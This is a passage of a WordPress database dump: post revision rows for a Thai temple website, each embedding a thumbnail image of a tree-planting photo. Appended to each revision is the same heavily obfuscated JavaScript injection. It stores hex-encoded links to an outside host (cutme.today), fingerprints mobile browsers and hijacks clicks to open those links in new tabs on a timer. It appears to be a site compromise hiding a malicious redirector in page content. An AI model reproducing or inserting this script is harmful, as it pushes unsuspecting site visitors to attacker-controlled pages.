test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','','','inherit','closed','closed','','306-revision-v1','','','2024-08-30 10:37:35','2024-08-30 03:37:35','',306,'http://watprato.ssk.in.th/?p=315',0,'revision','',0),
(316,2,'2024-08-30 10:37:38','2024-08-30 03:37:38','<!-- wp:generateblocks/container {\"uniqueId\":\"de360999\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:image {\"id\":311,\"sizeSlug\":\"thumbnail\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-thumbnail\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/ปลูกต้นไม้-150x150.jpg\" alt=\"\" class=\"wp-image-311\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','','','inherit','closed','closed','','306-revision-v1','','','2024-08-30 10:37:38','2024-08-30 03:37:38','',306,'http://watprato.ssk.in.th/?p=316',0,'revision','',0),
(317,2,'2024-08-30 10:38:56','2024-08-30 03:38:56','<!-- wp:generateblocks/container {\"uniqueId\":\"de360999\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:image {\"id\":311,\"sizeSlug\":\"thumbnail\"} -->\n<figure class=\"wp-block-image size-thumbnail\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/ปลูกต้นไม้-150x150.jpg\" alt=\"\" class=\"wp-image-311\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const 